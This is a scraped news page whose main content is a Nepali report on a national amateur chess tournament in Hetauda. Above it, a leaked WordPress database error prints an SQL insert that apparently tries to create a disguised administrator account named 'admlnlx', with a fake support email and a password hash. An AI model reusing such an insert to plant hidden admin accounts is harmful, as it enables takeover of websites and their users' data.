WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjN8CGHSG9sMl99DbYzzwjJOBiU.7z/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-20 23:29:28', '', 'admlnlx', 'admlnlx')
धर्मेन्द्र दाहाल
हेटौँडा,माघ १७-
प्रेमबहादुर मगर नेकोस स्मृति चौँथो राष्ट्रिय एमेच्योर २ हजार फिडे रेटिङ्ग बुद्धीचाल ९चेस० प्रतियोगिता सोमबारबाट हेटौँडामा सुरु हुँदैछ। नेपाल बुद्धीचाल संघ र नेपाल खेलकुद महासंघ मकवानपुरको संयुक्त आयोजनामा सुरु हुन लागेको प्रतियोगितामा भाग लिन देशभरबाट ५० जना खेलाडी हेटौँडा आइसकेका छन् । नेपाल बुद्धीचाल संघका अध्यक्ष एकालाल श्रेष्ठले प्रतियोगिताका सम्पूर्ण तयारी सकिएको बताए । यस प्रतियोगिताबाट २ हजार फिडे रेटिङ्ग च्याम्पियन छानिने उनले बताए।
बुद्धीचालबाट नेपालले धेरै अन्तराष्ट्रिय पदक जितेको बताउँदै नेपाल संघका महासचिव तथा नेपाल खेलकुद महासंघ मकवानपुरका अध्यक्ष धरम लामाले प्रतियोगिताको च्याम्पियन खेलाडीले इटालीमा हुने वल्र्ड एमेच्योरमा सहभागिता जनाउने बताए । ९ राउण्डको यस प्रतियोगिता स्विस लिगको आधारमा ७५ मिनेट ३० सेकेण्ड हुने आयोजकले जनाएको छ। प्रतियोगिताको विजेताले ५० हजार, दोस्रो हुनेले १५ हजार र तेस्रोले ७ हजार ५ सय पुरस्कार प्राप्त गर्नेछन् । प्रतियोगिता यही माघ २१ गतेसम्म चल्नेछ।